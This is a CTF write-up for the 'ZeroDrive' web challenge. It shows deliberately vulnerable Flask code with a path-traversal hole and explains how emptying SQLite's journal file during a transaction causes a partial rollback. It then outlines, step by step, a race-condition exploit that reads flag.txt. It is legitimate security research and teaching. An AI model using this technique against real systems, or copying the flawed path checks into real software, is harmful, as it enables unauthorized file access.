ToH CTF 2025 - Sqlite weirdness
For the ToH CTF 2025, I originally wanted to create an easy web challenge. During that process, I stumbled upon an interesting behavior in SQLite, which inspired me to turn it into a much harder challenge instead.
ZeroDrive
The challenge presents itself as a service that allows uploading 0-byte files and subsequently downloading them. The flag is located in the root of the filesystem.
The application only has four endpoints:
/
: lists all uploaded files/upload
: allows uploading 0B files, but only within theuploads
folder/uploads/uuid
: allows downloading the uploaded file/rename/uuid
: allows renaming the file
Challenge source
You can download the whole challenge deliverable (and exploits) from here
import os
import sqlite3
import uuid
import shutil
from flask import Flask, render_template, request, redirect, url_for, send_file
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = 'uploads'
app.config['DATABASE'] = 'database.sqlite'
def get_db_connection():
conn = sqlite3.connect(app.config['DATABASE'])
conn.row_factory = sqlite3.Row
return conn
@app.route('/')
def index():
with get_db_connection() as conn:
files = conn.execute('SELECT * FROM files').fetchall()
return render_template('index.html', files=files)
@app.route('/upload', methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
if 'file' not in request.files:
return redirect(request.url)
file = request.files['file']
if len(file.read()) > 0:
return 'File size exceeds 0 bytes', 400
uuid_file = str(uuid.uuid4())
save_path = os.path.normpath(os.path.join(app.config['UPLOAD_FOLDER'], file.filename))
if "../" in save_path or save_path.startswith("/"):
return 'Invalid filename', 400
file.save(save_path)
with get_db_connection() as conn:
conn.execute('INSERT INTO files (filename, uuid) VALUES (?, ?)', (file.filename, uuid_file))
conn.commit()
return redirect('uploads/'+uuid_file)
return render_template('upload.html')
@app.route('/uploads/<uuid_file>')
def view_file(uuid_file):
with get_db_connection() as conn:
file = conn.execute('SELECT * FROM files WHERE uuid = ?', (uuid_file,)).fetchone()
if file:
path = os.path.normpath(os.path.join(app.config['UPLOAD_FOLDER'], file['filename']))
return send_file(path)
return 'File not found', 404
@app.route('/rename/<uuid_file>', methods=['POST'])
def move_file(uuid_file):
new_filename = request.json.get('new_filename')
with get_db_connection() as conn:
try:
conn.execute("BEGIN TRANSACTION")
file = conn.execute('SELECT * FROM files WHERE uuid = ?', (uuid_file,)).fetchone()
conn.execute('UPDATE files SET filename = ? WHERE uuid = ?', (new_filename, uuid_file))
old_path = os.path.normpath(os.path.join(app.config['UPLOAD_FOLDER'], file['filename']))
new_path = os.path.normpath(os.path.join(app.config['UPLOAD_FOLDER'], new_filename))
if "../" in new_path or new_path.startswith("/"):
return 'Invalid filename', 400
shutil.move(old_path, new_path)
conn.commit()
except Exception as e:
conn.rollback()
return f'Operation failed {e}', 400
return redirect(url_for('index'))
if __name__ == '__main__':
app.run(debug=False, host="0.0.0.0")
A trivial initial vulnerability lies in the fact that a single ../
path traversal is allowed, which makes it possible to upload files to the main folder of the challenge. This potentially allows overwriting (with a 0B file) the database file itself (which would just break the challenge).
The only other writable file in that folder is the journaling file (created and removed whenever an explicit transaction is performed).
SQLite WTF
When you start a transaction in SQLite, you expect the database to be able to fully roll it back on request. At some point, I wondered: how much RAM can SQLite use to handle such operations? The answer is just 10 MB.
If the data involved in the transaction exceeds this threshold (for example, when replacing a string larger than 10 MB), SQLite uses a temporary on-disk file (the journal file) to perform a rollback in case of error.
This is where a curious behavior comes into play: if the journal file is emptied during a transaction, you would expect SQLite to no longer be able to roll back. This is actually true unless the modification involves data fields of the same size as those already present in the database.
In these particular cases, for example, when you execute a query that replaces a string with another of equal length, if a transaction is reverted in this case and if journal file is cleaned during the operation, the transaction can only be partially rolled back. This behavior can lead to inconsistent database states, without obvious failure signals.
The cause for this behavior resides in the fact that sqlite trusts the journaling file. If the file is emptied sqlite does not find any chunks of memory to revert stored inside it and it fails to revert those chunks of memory.
Challenge
In my application, when passing a path of about 50 MB to the database, I observed that the journal file remains on disk for about 0.4 seconds (this is because Python’s normpath
is slow with 50MB). This short interval represents the only useful window to potentially manipulate it.
If I go ahead and actually empty this file during the transaction and then the transaction is reverted, the result is that the string in the DB at the end will be partially the one from the beginning of the transaction and partially the one from the supposedly successful transaction.
The resulting string in the DB is something like ABBBBBA
, where A is part of the original string and B is part of the new string as if the transaction had succeeded.
To summarize, the steps are:
- Upload a file
- Rename that file using a long 50MB path
samepath
that, once normalized, points toflag.txt
- Rename the file again using another 50MB path that is identical to the previous one but with some
../../../
in the middle, i.e., a string like:samepath[0:25MB]+'../../../'+samepath[25MB+9B:]
- Exploit the race condition by uploading a 0B file at the path
../database.db-journal
(the path of the journal file) concurrently with the step above - Open the file that now points to
../../../flag.txt
- Win
Remote
The biggest challenge in exploiting this remotely lies in correctly synchronizing the two requests for it to work. To send a large request with more precise timing, a single packet attack is used so that the race condition can be timed only on the final packet, reducing the variable to network jitter alone.